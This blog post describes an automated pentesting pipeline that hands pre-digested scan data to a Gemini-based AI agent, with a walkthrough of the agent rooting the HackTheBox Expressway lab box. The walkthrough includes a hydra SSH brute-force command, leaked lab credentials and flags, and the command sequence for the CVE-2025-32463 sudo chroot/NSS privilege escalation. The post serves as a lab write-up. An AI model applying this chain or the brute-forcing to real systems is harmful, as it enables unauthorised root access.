Agent Opulence: My Quest to Build an AI to Own Everything

A queer hacker's journey to owning everything.

Disclaimer: The views, opinions, and general brainrot expressed in this post are my own and do not necessarily reflect the views or position of any other entity including, most importantly, my employer.

Edit (Feb 17, 2026): I wrote "everything routes through VPN" and then immediately forgot that I'd built Dame with a split tunnel so it could reach the Gemini API 🤦. Recon and C2 containers are fully VPN'd — Dame is not. This matters a lot in Part 2. Also corrected the commit count and test count, which drifted during pre-release cleanup.

PoC || GTFO

Code here. Spoiler alert, it's all vibe coded.

TLDR

Agent Opulence is an automated pentesting pipeline experiment / weekend project that got outta hand. Deterministic recon and enrichment up front, AI exploitation after. The agent doesn't scan — it shows up with a plan and a loaded gun.

On HTB Expressway, that looked like: hypothesizing an IKE pre-shared key attack from port scan data, pivoting to OSINT when the tools it wanted weren't installed (because I couldn't be bothered to give it proper tools, "it's just a PoC," I said), pulling the PSK freakingrockstarontheroad, SSH'ing in as user ike, finding a sudo vulnerability disclosed months earlier, writing a malicious shared library in C, compiling it on the box, and walking out with root.

All in twenty minutes! It also wasted 13 of those 20 minutes banging on a TFTP server it couldn't talk to because the container didn't have a TFTP client... so there's that.

Here's exactly how it works, where it fails, and why context rot forced me to build it differently.



Why "Opulence"

Every hacker's dream is owning every box on the planet. So when I heard Junior LaBeija in Paris is Burning spell it out — "O-P-U-L-E-N-C-E. Opulence. You own everything. Everything is yours." — it hit different.

In ballroom, the gatekeepers are a world that won't let you live authentically — bigotry that says you can't be who you are, can't have what they have. In hacking, the gatekeepers are the defenses and the defenders. Either way, it's claiming ownership of something they said wasn't yours. The project had its name before it had a single line of code.

Scan First, Think Later

So a lot of folks on GitHub had the same idea I had at first. This is what I call the "unga bunga" phase of a software idea: what's a way, any way, to get from point A to point B, even if it's just duct tape and a dream?

In this instance, that manifests as "give an AI access to all the hacking tools and say 'go do a crime.'" The agent gets a target, and it does all the enumeration itself. My version of this was even more ambitious — I was going to use Meta MCP to run different namespaces for different collections of tools, segmented by how destructive they were. Passive recon in one namespace, active scanning in another, exploitation tools in a third. The agent would get access to each collection as it progressed through phases. I got as far as nmap, saw the output tokens, and realized I was just adding ceremony to the same idea. The agent was still the one running the tools. Still burning tokens on output it didn't need to reason about. I'd built a velvet rope around the unga bunga.

Is that the hard part of hacking? It's the most important part, for sure; most would argue that (myself included). For human decision-making, much like for these LLM tools, context is everything. We've all been there: you're trying to gain access to this box, you feel like you've enumerated everything, and then you do one last thing and find a security hole that not only has a neon sign over it, but also has a tramp stamp, a signed letter of consent that's been notarized, and a red carpet.

But it's not hard. Nmap doesn't need strategic reasoning. Neither does feroxbuster. Neither does nuclei. Some of these tools have decades of engineering behind them. They're fast, reliable, and thorough in ways that no LLM will match. So do the scanning ahead of time, for the agent, and present it in a report that makes the information visible and ready to work with.

The actual hard part (ok that's the last one, I swear) is the decision-making between tool outputs. It's reading an nmap scan, noticing that UDP/500 is open, connecting that to the box name "Expressway," and hypothesizing that IKE aggressive mode might leak a crackable PSK hash. It's deciding whether to brute-force SSH or investigate the weird UDP service first. It's pivoting when the tool you need isn't installed. That's reasoning. That's what LLMs are actually good at. And that's the part most of these frameworks have burned through their context windows before reaching. Dex Horthy's 12-Factor Agents nailed it: most agents in production are "mostly deterministic code, with LLM steps sprinkled in at just the right points."

What further drove this point home for me was Chroma's research into "context rot", showing that yes, model performance does degrade as context window usage increases. This was a fun development because I finally had a good way to explain to folks what working memory shortages feel like as someone with ADHD. So LLMs are neurospicy as well, huh? Another thing that inspired my design from Dex's piece was how he frames agents — not as different people on a team. That's how you can structure the persona in their prompts, sure, but they need to be thought of as context window buckets. The constant question is: "Does the main agent have to see the details of this to continue? Or is there a direct enough prompt that I can give to a clone that will provide all the necessary information for a correct, informed decision?"

What I hadn't surveyed was what other pentesting agents were doing. When I went looking, I found the pattern had been independently validated. CHECKMATE (Wang et al., 2025) tested it empirically: offloading deterministic work to a classical planner yielded 53% lower cost and 20%+ higher success rates. PentestGPT's own evaluation data tells the story from the failure side: session context loss was its leading failure mode. Practitioners and researchers kept arriving at the same boundary: don't burn reasoning capacity on work that doesn't require reasoning.

The Core Insight: Dumb Tools Scan, Smart Agents Plan

So here's what Agent Opulence actually does. Four steps:

Scan everything up front. AutoRecon runs 150+ tools against the target — nmap, nuclei, feroxbuster, whatweb, enum4linux, the whole kitchen sink. No LLM in the loop. No tokens burned. Just decades of security tooling doing what it's always done, completely automated.

Distill and enrich, classically. Raw scan output gets uploaded to Faraday (80+ built-in parsers, so I'm not writing my own for every tool format), then enriched with CVE scores, exploitability assessments, and service-specific context. All deterministic code. Static databases mapping services to known vulns, default creds, attack vectors. Math formulas scoring priority. This is standard pipeline engineering — nothing novel, and that's the point. The output is a YAML document called a CAS (Context-Aware Summary) that a human analyst could read just as easily as the AI can.
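To make "math formulas scoring priority" concrete, here's a minimal Python sketch of what a deterministic enricher could look like. It is not the project's code: the `SERVICE_VECTORS` and `DEFAULT_CREDS` tables, the `Finding` fields, and the scoring weights are all hypothetical (the ssh vectors are borrowed from the CAS example further down). The point is the shape: static lookups plus a fixed formula, so the same scan always produces the same ranking.

```python
from dataclasses import dataclass, field

# Hypothetical static knowledge base: service name -> attack vectors.
# The ssh entry mirrors the CAS example in this post; the others are illustrative.
SERVICE_VECTORS = {
    "ssh": ["private_key_disclosure", "username_enum", "version_specific_exploits"],
    "tftp": ["unauthenticated_file_read"],
    "isakmp": ["ike_aggressive_mode_psk"],
}

# Hypothetical default-credential table, keyed by service.
DEFAULT_CREDS = {"ssh": [("root", "root")]}


@dataclass
class Finding:
    port: int
    service: str
    cvss: float = 0.0            # highest CVSS base score matched to this version
    exploit_public: bool = False
    vectors: list = field(default_factory=list)
    priority: float = 0.0


def enrich(finding: Finding) -> Finding:
    """Attach static vectors and compute a deterministic priority score."""
    finding.vectors = list(SERVICE_VECTORS.get(finding.service, []))
    # Hypothetical formula: CVSS dominates, a public exploit doubles it,
    # and each known vector or default-cred entry adds a small bonus.
    score = finding.cvss * (2.0 if finding.exploit_public else 1.0)
    score += 0.5 * len(finding.vectors)
    score += 1.0 * len(DEFAULT_CREDS.get(finding.service, []))
    finding.priority = round(score, 2)
    return finding


def prioritize(findings):
    """Highest score first; ties broken by port number."""
    return sorted((enrich(f) for f in findings), key=lambda f: (-f.priority, f.port))
```

The tie-break on port number makes the output order independent of the order the parsers emitted findings in, which is what keeps the resulting CAS diffable.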

Reasoning enrichment. Exactly one LLM call. Gemini Flash reads the enriched CAS data and generates attack guidance — target prioritization, quick wins, recommended commands. This is the only point in the entire pipeline where an LLM touches the data before Dame does. And if Gemini is unavailable, the system falls back to heuristic sorting and keeps working. The pipeline doesn't need the LLM. It's better with it.
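A minimal sketch of the "one call, with a fallback" pattern, assuming the Gemini call is wrapped in some `llm_call` function that takes the enriched findings and returns a guidance dict. The function names and the dict shape are hypothetical; the only thing the sketch commits to is the control flow: try the LLM once, and if anything goes wrong, return a deterministic ranking instead of failing the pipeline.

```python
from typing import Callable, Optional


def heuristic_guidance(findings: list) -> dict:
    """Deterministic fallback: rank by the precomputed priority score, then port."""
    ranked = sorted(findings, key=lambda f: (-f["priority"], f["port"]))
    return {
        "source": "heuristic",
        "target_order": [f"{f['service']}:{f['port']}" for f in ranked],
    }


def attack_guidance(findings: list,
                    llm_call: Optional[Callable[[list], dict]] = None) -> dict:
    """Make at most one LLM call; on any failure, fall back to the heuristic."""
    if llm_call is not None:
        try:
            guidance = llm_call(findings)
            guidance["source"] = "llm"
            return guidance
        except Exception:
            pass  # network error, quota, malformed response: keep the pipeline moving
    return heuristic_guidance(findings)
```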

Then give the agent a loaded gun. Dame starts with complete situational awareness. Every open port, every service version, every potential vulnerability, and a prioritized list of what to try first. It's not discovering the attack surface — it's exploiting it.

That's Dex's quote made real. Mostly deterministic code, with one LLM step sprinkled in at just the right point.

┌─────────────────────────────────────────────────────────────┐
│ PHASE 1: AUTOMATED RECONNAISSANCE (Deterministic)           │
│ nmap → httpx → nuclei → feroxbuster → nikto → whatweb       │
│ Outputs: XML/JSON raw scans → /artifacts/raw/               │
└──────────────────────┬──────────────────────────────────────┘
                       ↓
┌─────────────────────────────────────────────────────────────┐
│ ENRICHMENT PIPELINE (Parsers, Enrichers, CAS Formatter)     │
│ Watcher detects files → Parse to JSON → Enrich with CVEs    │
│ Format to YAML → Initialize PTT                             │
│ Output: /artifacts/{target}/context.yaml + ptt.yaml         │
└──────────────────────┬──────────────────────────────────────┘
                       ↓
┌─────────────────────────────────────────────────────────────┐
│ PHASE 2: AI-DRIVEN EXPLOITATION (Strategic)                 │
│ Dame (AI Agent) loads PTT → Executes → Adapts → Escalates   │
│ Tools: msfconsole, searchsploit, pwncat-cs, manual exploits │
└─────────────────────────────────────────────────────────────┘

Numbers don't lie (unless they're on Grindr). The CAS for Expressway compressed to roughly a thousand tokens of structured YAML. The raw scan output — nmap XML, UDP probe results, service fingerprints — ran over ten thousand tokens, and Expressway was a minimal target with no web services. A box with HTTP endpoints would generate an order of magnitude more from feroxbuster, whatweb, and nuclei alone. The agent never burns turns on "let me run nmap first." The scan data is digested and waiting before the conversation starts.

And because the pipeline is almost entirely deterministic, it's reproducible. Same scan results, same CAS, every time. You can diff two of them, version them, debug them. You're not guessing what the LLM hallucinated into existence — you're reading a structured report that was computed, not generated.
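Here's one way to get that "diffable, versionable" property, sketched in Python. Assumption: the real CAS is YAML, but to stay within the standard library this sketch canonicalizes the same data as JSON with sorted keys. A stable serialization gives you a content hash for "did anything change?" and a unified diff for "what changed?".

```python
import difflib
import hashlib
import json


def canonical(cas: dict) -> str:
    """Sorted keys + fixed indentation: identical data always serializes identically."""
    return json.dumps(cas, sort_keys=True, indent=2)


def fingerprint(cas: dict) -> str:
    """Content hash of the canonical form, handy for versioning CAS snapshots."""
    return hashlib.sha256(canonical(cas).encode("utf-8")).hexdigest()


def diff_cas(old: dict, new: dict) -> list:
    """Line-level unified diff between two CAS snapshots (empty list if identical)."""
    return list(difflib.unified_diff(
        canonical(old).splitlines(), canonical(new).splitlines(),
        fromfile="old", tofile="new", lineterm=""))
```

Key order in the input dict doesn't matter: two scans that found the same things produce the same fingerprint and an empty diff.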

I'm not claiming the idea of pre-processing data for an LLM is novel — that's table stakes. What I think is worth sharing is the specific combination: Faraday as a universal parser so you're not maintaining custom code for every tool format, a YAML schema with CVE enrichment and exploitability scoring baked in, and attack guidance generated as part of the distillation rather than leaving it to the agent's first turn. The CAS is a document, not a prompt artifact.

The broader agent-building community landed in the same place independently. Anthropic's context engineering guide describes context as a "finite resource with diminishing marginal returns" and recommends loading high-value context upfront. The Manus team hit the same wall at production scale — they offload tool results to the filesystem and use restorable compression to keep context lean. The CAS solves the same problem from the other direction: pre-compute the distillation so the agent never has to wade through raw output in the first place.

Architecture Overview

The whole thing runs in containers. Network isolation is layered: recon, C2, and enrichment containers route all traffic through a VPN gateway so they're only ever talking to HTB subnets. Dame is the exception — it uses a split tunnel, routing HTB subnets through the VPN but keeping direct internet access for the Gemini API. More on the implications of that in Part 2.

┌─────────────────────────────────────────────────────────────┐
│ DAME CONTAINER                                              │
│ Kali Linux + gemini-cli + pwncat-cs                         │
│ Dame (AI): Reads CAS, exploits, privesc                     │
│ Network: Split tunnel (HTB via VPN, internet direct)        │
├─────────────────────────────────────────────────────────────┤
│ ENRICHMENT PIPELINE                                         │
│ faraday_watcher.py → Parsers → Enrichers → CAS Formatter    │
├─────────────────────────────────────────────────────────────┤
│ HEXSTRIKE (Recon Tools)                                     │
│ AutoRecon, nmap, nuclei, feroxbuster, 150+ tools            │
├─────────────────────────────────────────────────────────────┤
│ C2 FRAMEWORKS (MSF + Sliver)                                │
│ msf (msfrpcd) + msf-bridge + sliver daemon                  │
├─────────────────────────────────────────────────────────────┤
│ NETWORK ISOLATION (GLUETUN)                                 │
│ VPN tunnel + killswitch, recon/C2 traffic through HTB VPN   │
└─────────────────────────────────────────────────────────────┘

Gluetun is the foundation: a VPN container with a killswitch. If the VPN drops, traffic stops. Full stop. Recon, enrichment, and C2 containers run their network stacks entirely through gluetun, so they can't reach anything outside HTB subnets. Dame needs direct internet access for the Gemini API, so it runs a split tunnel: HTB subnets route through the VPN, everything else goes direct. If you're building something that runs offensive tools, network isolation is not optional. It's how you avoid accidentally scanning your ISP's infrastructure.
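The routing policy is easier to reason about written down as a function. This Python sketch models the rules described above; it is not how gluetun enforces them (that happens in the container's firewall and routing tables). The `HTB_SUBNETS` values are an assumption based on commonly seen HackTheBox ranges, and the container labels are hypothetical.

```python
import ipaddress

# Assumption: HTB lab traffic lives in these ranges. Adjust to your VPN config.
HTB_SUBNETS = [ipaddress.ip_network(n) for n in ("10.10.0.0/16", "10.129.0.0/16")]


def route(dest: str, container: str, vpn_up: bool) -> str:
    """Return 'vpn', 'direct', or 'drop' for traffic leaving `container`."""
    addr = ipaddress.ip_address(dest)
    in_htb = any(addr in net for net in HTB_SUBNETS)
    if container != "dame" and not in_htb:
        return "drop"                        # fully VPN'd containers: HTB subnets only
    if in_htb:
        return "vpn" if vpn_up else "drop"   # killswitch: no tunnel, no traffic
    return "direct"                          # Dame's split tunnel, e.g. the Gemini API
```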

HexStrike is the recon container — the "unga bunga" phase from earlier, fully automated. AutoRecon orchestrates 150+ security tools in parallel against the target. The raw output (XML, JSON, text) gets dropped into a shared volume.

The Enrichment Pipeline watches for new scan files and runs the distillation process I described above — Faraday parsing, deterministic enrichment, the single Gemini call for attack guidance, and CAS generation. The output is a YAML file that looks like this:

# Truncated CAS example: what the AI agent actually reads
cas_version: '1.1'
target:
  identifier: 10.129.1.128
  hostname: expressway.htb
summary:
  hosts_discovered: 1
  critical_findings: 0
  web_services_found: 0
hosts:
  - ip: 10.129.1.128
    hostname: expressway.htb
    os:
      name: Linux 4.15 - 5.19
      accuracy: 98
    ports:
      - port: 22
        service: ssh
        version: OpenSSH 10.0p2 Debian 8
        vectors:
          - private_key_disclosure
          - username_enum
          - version_specific_exploits
attack_guidance:
  quick_wins:
    - hydra Bruteforce logins on ssh:22
    - SSH found - look for key leaks via LFI, .git, backups
  recommended_commands:
    - command: hydra -L usernames.txt -P passwords.txt ssh://expressway.htb

That's what Dame sees when it starts a session. Not raw XML. Not 10,000 lines of nmap output. A structured document that says "here's the target, here's what's open, here's what to try first."
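For a sense of how the `summary` block could be derived, here's a hypothetical Python sketch that assembles the top of a CAS from already-enriched host records. Assumptions: "critical" means CVSS 9.0 or higher (the CVSS v3 critical band), the set of web service names is illustrative, and the output is a plain dict that the real formatter would serialize to YAML.

```python
# Illustrative set of service names counted as "web".
WEB_SERVICES = {"http", "https", "http-proxy", "ssl/http"}


def build_cas(target_ip: str, hostname: str, hosts: list) -> dict:
    """Assemble the top of a CAS document from enriched host records."""
    ports = [p for h in hosts for p in h.get("ports", [])]
    return {
        "cas_version": "1.1",
        "target": {"identifier": target_ip, "hostname": hostname},
        "summary": {
            "hosts_discovered": len(hosts),
            # Assumption: critical = CVSS >= 9.0 on any matched vulnerability.
            "critical_findings": sum(1 for p in ports if p.get("cvss", 0.0) >= 9.0),
            "web_services_found": sum(1 for p in ports if p["service"] in WEB_SERVICES),
        },
        "hosts": hosts,
    }
```

Fed the single Expressway host from the example above (SSH only, no CVSS match), this yields the same `summary` values: one host, zero critical findings, zero web services.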

Dame is the AI agent — a Kali Linux container running Gemini CLI with a custom extension called PrEP (because it keeps the Dame safe). Dame has access to offensive tools (pwncat, crackmapexec, impacket, hydra, etc.), MCP servers for Metasploit and Sliver, and a vector database of exploitation techniques sourced from IppSec videos. When you type /attack 10.129.1.128, Dame reads the CAS, reads the PTT (Pentesting Task Tree — a structured checklist of techniques to try per service), and starts working.

The PTT started as a practical problem: I needed a way to track what Dame had tried, what succeeded, and what to attempt next as engagement state changed. Claude Code surfaced the concept during development: a research subagent found PentestGPT's Pentesting Task Tree and recommended the approach. I hadn't read the paper myself; my development tool had. The difference from PentestGPT is when the tree gets built. Mine is pre-populated from deterministic enrichment before the agent starts, so the initial structure is reproducible. The agent updates it as it works, but it starts from a richer baseline.
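A minimal sketch of a pre-seeded task tree, in Python. The `Task` structure, the `playbook` mapping, and the status values are hypothetical, and this is not PentestGPT's PTT format either. What the sketch shows is the split described above: the initial tree comes deterministically from CAS ports, and the agent only ever updates node status and picks the next open task.

```python
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Task:
    name: str
    status: str = "todo"  # hypothetical states: todo | done | failed
    notes: str = ""
    children: list = field(default_factory=list)


def seed_ptt(cas_ports: list, playbook: dict) -> Task:
    """Build the initial tree deterministically: one node per port, one leaf per playbook step."""
    root = Task("target")
    for p in sorted(cas_ports, key=lambda p: p["port"]):
        node = Task(f"{p['service']}:{p['port']}")
        node.children = [Task(step) for step in playbook.get(p["service"], [])]
        root.children.append(node)
    return root


def update(root: Task, path: list, status: str, notes: str = "") -> None:
    """Agent-side update: walk the tree by node names and mark the final node."""
    node = root
    for name in path:
        match = next((c for c in node.children if c.name == name), None)
        if match is None:
            raise KeyError(f"no task named {name!r} under {node.name!r}")
        node = match
    node.status, node.notes = status, notes


def next_todo(node: Task) -> Optional[Task]:
    """Depth-first: return the first leaf still marked 'todo', or None."""
    for child in node.children:
        if not child.children:
            if child.status == "todo":
                return child
        else:
            found = next_todo(child)
            if found is not None:
                return found
    return None
```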

The technique library deserves a mention. I used Fabric (Daniel Miessler's AI extraction framework) to transcribe and extract structured data from dozens of IppSec HTB walkthrough videos, then loaded those into a Qdrant vector database — the grimoire. It's a tome of evil spells. When Dame encounters a service it hasn't seen before, it queries the grimoire: "linux tftp exploitation enumeration download files" returns technique cards with exact commands, decision points, and follow-up actions. It's like giving the agent a searchable notebook of a senior pentester's experience — except the notebook can't reason about context, so the agent still has to decide when and how to apply what it finds.
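To show what "query the grimoire" means mechanically, here's a toy Python version of vector retrieval. It swaps the real pieces for stand-ins: bag-of-words counts instead of learned embeddings, an in-memory list instead of Qdrant, and three made-up technique cards. The ranking idea, cosine similarity between the query vector and each card's vector, is one of the distance metrics vector databases such as Qdrant support.

```python
import math
import re
from collections import Counter

# Made-up technique cards standing in for Fabric-extracted IppSec content.
CARDS = [
    {"title": "TFTP file retrieval", "text": "linux tftp enumeration download config files udp 69"},
    {"title": "IKE aggressive mode PSK", "text": "ike isakmp udp 500 aggressive mode psk hash crack"},
    {"title": "SNMP community strings", "text": "snmp udp 161 community string enumeration"},
]


def vectorize(text: str) -> Counter:
    """Toy 'embedding': lowercase token counts."""
    return Counter(re.findall(r"[a-z0-9]+", text.lower()))


def cosine(a: Counter, b: Counter) -> float:
    dot = sum(a[t] * b[t] for t in a.keys() & b.keys())
    norm = math.sqrt(sum(v * v for v in a.values())) * math.sqrt(sum(v * v for v in b.values()))
    return dot / norm if norm else 0.0


def query(q: str, k: int = 2) -> list:
    """Return the titles of the k cards most similar to the query."""
    qv = vectorize(q)
    ranked = sorted(CARDS, key=lambda c: cosine(qv, vectorize(c["text"])), reverse=True)
    return [c["title"] for c in ranked[:k]]
```

With these cards, `query("linux tftp exploitation enumeration download files", k=1)` returns `["TFTP file retrieval"]`. The toy also shows the limit mentioned above: retrieval ranks text, it doesn't decide whether the technique applies.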

Building It

Just under a hundred commits. Three weeks of evenings and weekends. The pipeline came first — everything from AutoRecon orchestration through enrichment to the CAS was built and working before Dame existed. The agent was the last piece, not the first. That ordering wasn't accidental: if your whole thesis is that the AI shouldn't waste tokens on work that's already solved, you should probably solve it first.

The architecture earned its keep on day 5, when the first Expressway session forced the recon/exploitation separation to prove itself. The biggest pivot came two days later — I'd been writing custom parsers, one for nmap XML, one for nuclei JSON, one for each tool format, and hit eight before stopping to ask the obvious question: someone must have solved this already. That search led to Faraday's 80+ built-in parsers, and I replaced the entire parsing layer without touching Dame. That's the test of a good boundary: you can swap one side and the other doesn't notice. By the end, the codebase had a hook system for tool execution guardrails, loop detection, output truncation, and over 450 tests.
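Loop detection is the guardrail most relevant to the TFTP story later on. Here's a minimal Python sketch of one possible approach; the project's actual hook may work differently. It assumes each tool call is reported as a command string plus a coarse outcome label (`"ok"`, `"timeout"`, and so on), and it fires when the same tool keeps producing the same failure within a short window. The window and threshold defaults are arbitrary.

```python
from collections import deque


class LoopDetector:
    """Flag an agent that keeps hitting the same tool with the same failure."""

    def __init__(self, window: int = 6, threshold: int = 3):
        self.recent = deque(maxlen=window)  # last `window` (tool, outcome) pairs
        self.threshold = threshold

    def check(self, command: str, outcome: str) -> bool:
        """Record one tool call; True means a 'stop and rethink' nudge should fire."""
        parts = command.split()
        key = (parts[0] if parts else "", outcome)
        self.recent.append(key)
        return outcome != "ok" and self.recent.count(key) >= self.threshold
```

Keying on tool plus outcome rather than the exact command is deliberate: Dame's TFTP attempts varied the filename every time, so an exact-match check would never have fired.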

A note on the meta-tooling, because people always ask: I used Claude Code to build the infrastructure — the Docker configs, the enrichment pipeline, the MCP servers, the test suite. Dame runs on Gemini CLI, Google's open-source CLI agent. The split was economic: my family plan includes Google's AI Pro tier, which covers Gemini CLI usage. I saved the Claude credits for actual development. It turned out to be a happy accident — Claude Code excels at software engineering (writing parsers, fixing Docker networking, building test fixtures), while Gemini CLI's tool-use extensions and web search made it surprisingly effective at the pentesting workflow where you need to chain shell commands, search for exploits, and adapt on the fly.

The hardest engineering problem so far wasn't the pipeline or the containers — it was context management inside Dame itself. The same context rot that motivated the CAS design hits the agent during long engagements: as the conversation grows, performance degrades. The mitigation is architectural: subagents handle bounded tasks (research, code analysis) so their output doesn't bloat Dame's window, skills load instructions on-demand rather than permanently, and hooks truncate verbose tool output before it enters the context. Remember, context window buckets. The constant question at every level: does the main agent have to see this? If not, compartmentalize it.
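A sketch of the truncation idea in Python, assuming a simple character budget rather than a token count. It keeps the head and the tail and says how much it dropped. Keeping the tail is deliberate: error messages and summaries tend to land at the end of tool output. The function name and defaults are hypothetical.

```python
def truncate_output(text: str, max_chars: int = 2000, head_ratio: float = 0.6) -> str:
    """Keep the head and tail of verbose tool output and mark what was cut."""
    if len(text) <= max_chars:
        return text
    head = int(max_chars * head_ratio)
    tail = max_chars - head
    omitted = len(text) - head - tail
    # Slice the tail by absolute index so tail == 0 can't accidentally return everything.
    return f"{text[:head]}\n[... {omitted} chars truncated ...]\n{text[len(text) - tail:]}"
```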

Case Study: HTB Expressway

This is the session that made me think this project was worth writing about.

What Dame Knew

The CAS for Expressway was sparse: SSH on TCP/22, TFTP on UDP/69. No web services, no SMB, no obvious vulnerabilities. But Dame also picked up on what the CAS didn't explicitly call out: beyond TFTP on 69, the UDP scan had flagged ports 161 (SNMP) and 500 (IKE).

The TFTP Dead End

Dame's first instinct was TFTP. The protocol has no authentication at all, which means that if you can guess filenames, you can pull config files or credentials. So Dame tried:

$ curl tftp://10.129.1.128/etc/passwd --connect-timeout 5 --max-time 10
curl: (28) TFTP response timeout

Timeout after timeout. It tried common Cisco Expressway filenames (jabber-config.xml, psk.txt): all timeouts. Then it looked for a TFTP client:

$ which tftp
(not found)
$ which atftp
(not found)

No TFTP client in the container. The curl-based approach was failing because TFTP uses random high ports for data transfer — over a VPN tunnel, this is unreliable at best. A human pentester would have recognized this after the first timeout. Dame kept trying for thirteen minutes.

During those thirteen minutes, it also tried to install ike-scan (wrong syntax), checked for vpnc and strongswan (not installed), looked for msfconsole (not in the container), attempted to write raw IKE packets in Python (couldn't without scapy), and probed SNMP with various community strings (all timed out). Methodical, I'll give it that. Just methodically wrong about where to spend its time.

The Pivot

After thirteen minutes, Dame abandoned TFTP. It had been building a hypothesis throughout the dead end: UDP/500 means IKE, IKE aggressive mode leaks a crackable hash of the pre-shared key, and "Expressway" is a Cisco product associated with VPN configurations. With no IKE tools available, it fell back to OSINT:

GoogleSearch: "expressway" htb machine psk hash cracking

The search returned writeups for this retired box. Dame extracted the PSK (freakingrockstarontheroad) and the username (ike).

I'll be direct about what happened here. This was a retired box — that web search wouldn't work on a live engagement. But the hypothesis formation matters: connecting UDP/500 + "Expressway" to IKE PSK cracking is genuine inference from scan data. With ike-scan installed, Dame could test that hypothesis directly. Solvable engineering problem.

Initial Access

Dame tried sshpass first (not installed — sensing a pattern?), then fell back to paramiko. Simplified:

$ ssh ike@10.129.1.128
Password: freakingrockstarontheroad
ike@expressway:~$ cat user.txt
268b375ff040f139aa69ce8fcc5d58bd

User flag captured. Dame updated its PTT with credentials and access level, opened a pwncat session for persistence, and pivoted to privilege escalation.

Privilege Escalation

This is where the session earned its keep.

Standard post-exploitation enumeration turned up nothing actionable. But when Dame checked the sudo version — 1.9.17 — it searched for recent vulnerabilities and found CVE-2025-32463, a sudo "chwoot" bypass disclosed just months earlier.

This wasn't DirtyCow or PwnKit, the kind of privesc any script kiddie has memorized. CVE-2025-32463 exploits a subtle interaction between sudo's -R (chroot) flag and NSS library loading. When sudo chroots into a user-controlled directory, it still tries to resolve usernames, and it reads nsswitch.conf from inside that directory. Write an nsswitch.conf that names a malicious NSS module, plant the matching libnss_*.so where glibc will go looking for it, and it gets loaded with root privileges.
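Why does the exploit below create a directory literally named `libnss_`? glibc loads NSS modules by name, following the pattern `libnss_<service>.so.2` (that's where files like `libnss_files.so.2` come from). This Python sketch only models that naming convention; it is not glibc code, and the parser ignores nsswitch.conf action items like `[NOTFOUND=return]`. Feed it the attacker's service name, `/woot1337`, and the "library name" comes out containing a slash. Per dlopen(3), a filename containing a slash is treated as a pathname instead of being searched for on the library path, which is what lets a user-controlled file get loaded.

```python
def nss_sources(nsswitch_line: str) -> tuple:
    """Split an nsswitch.conf line like 'passwd: files systemd' into (database, services)."""
    database, _, rest = nsswitch_line.partition(":")
    return database.strip(), rest.split()


def nss_module_filename(service: str, revision: str = "2") -> str:
    """Model glibc's module naming scheme: libnss_<service>.so.<revision>."""
    return f"libnss_{service}.so.{revision}"


# A normal config vs. the one the exploit writes into the fake root.
for line in ("passwd: files systemd", "passwd: /woot1337"):
    db, services = nss_sources(line)
    print(db, [nss_module_filename(s) for s in services])
```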

Dame worked through the exploit chain: fake root filesystem, C payload calling setuid(0), compiled as a shared object on-target:

# Create fake chroot structure
ike@expressway:~$ mkdir -p /tmp/exploit_w/woot/etc /tmp/exploit_w/libnss_
# Fake nsswitch.conf pointing to our malicious NSS module
ike@expressway:~$ echo "passwd: /woot1337" > /tmp/exploit_w/woot/etc/nsswitch.conf
# Compile malicious shared library that escalates privileges
ike@expressway:~$ echo '<base64 payload>' | base64 -d > /tmp/exploit_w/woot.c
ike@expressway:~$ gcc -shared -fPIC -Wl,-init,woot \
    -o /tmp/exploit_w/libnss_/woot1337.so.2 /tmp/exploit_w/woot.c
# Trigger the vuln: sudo -R chroots into our fake root
ike@expressway:~$ cd /tmp/exploit_w && sudo -R woot woot

Root shell. Root flag: 5b2db29ec66125e1fd17d7c21a77f088.

Three minutes from sudo version check to root flag. No writeup lookup this time. Dame identified a recent CVE, understood the exploit mechanics well enough to construct the payload, compiled it on-target, and executed it. That's where an LLM adds value a script can't: synthesizing vulnerability research into a working exploit chain against a specific configuration, without a human connecting the dots.

What This Tells Us

The privesc speaks for itself. The concerning part is the thirteen minutes before it.

Dame's TFTP hypothesis was sound — that was reasoning. The failure was environmental modeling. It had no mental model of its own container: what tools were installed, what network paths were available, what protocols could traverse the VPN. It never ran dpkg -l | grep tftp or tested whether UDP worked through the tunnel. A human pentester would have diagnosed this in 30 seconds.
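Testing whether UDP works through the tunnel doesn't need a TFTP client at all. Here's a hedged Python sketch of a one-packet probe: it sends an RFC 1350 read request and waits for any reply. An ERROR packet (file not found, access violation) is good news here, because it proves the UDP path works. The reply is read with `recvfrom` from whatever port it arrives on, since TFTP servers answer from a freshly chosen port rather than from 69. The function names, default filename, and timeout are arbitrary choices for illustration.

```python
import socket
import struct


def tftp_rrq(filename: str, mode: str = "octet") -> bytes:
    """RFC 1350 read request: 2-byte opcode 1, filename, NUL, mode, NUL."""
    return struct.pack("!H", 1) + filename.encode("ascii") + b"\x00" + mode.encode("ascii") + b"\x00"


def tftp_probe(host: str, filename: str = "probe.txt", timeout: float = 3.0) -> str:
    """Send one read request to UDP/69 and report whatever comes back, if anything."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        try:
            sock.sendto(tftp_rrq(filename), (host, 69))
            # Accept a reply from any source port: the server answers from a new one.
            data, (peer, port) = sock.recvfrom(1024)
        except socket.timeout:
            return "no reply: UDP filtered, dropped in the tunnel, or no server"
        except OSError as exc:
            return f"socket error: {exc}"
    if len(data) < 2:
        return "malformed reply"
    opcode = struct.unpack("!H", data[:2])[0]
    kind = {3: "DATA", 5: "ERROR"}.get(opcode, f"opcode {opcode}")
    return f"{kind} from {peer}:{port}"
```

One probe, one timeout, one clear answer: either the path works and the problem is tooling, or it doesn't and TFTP is off the table.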

| Time | Event |
|------|-------|
| 17:15 | Started, identified SSH + TFTP + IKE |
| 17:15–17:28 | TFTP dead end: 13 minutes of timeouts |
| 17:28 | Pivoted to OSINT, found IKE credentials |
| 17:29 | SSH'd in as ike, captured user flag |
| 17:32 | Identified CVE-2025-32463 in sudo 1.9.17 |
| 17:35 | Compiled chwoot exploit on-target, captured root flag |
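The timeline arithmetic, checked in a few lines of Python (times copied from the table; the event labels are my own shorthand):

```python
from datetime import datetime

# Times from the session timeline above; labels are shorthand.
TIMELINE = {"start": "17:15", "pivot": "17:28", "user_flag": "17:29",
            "sudo_cve": "17:32", "root_flag": "17:35"}


def minutes_between(a: str, b: str) -> int:
    fmt = "%H:%M"
    delta = datetime.strptime(TIMELINE[b], fmt) - datetime.strptime(TIMELINE[a], fmt)
    return int(delta.total_seconds() // 60)


dead_end = minutes_between("start", "pivot")             # 13
pivot_to_root = minutes_between("pivot", "root_flag")    # 7
sudo_to_root = minutes_between("sudo_cve", "root_flag")  # 3
total = minutes_between("start", "root_flag")            # 20
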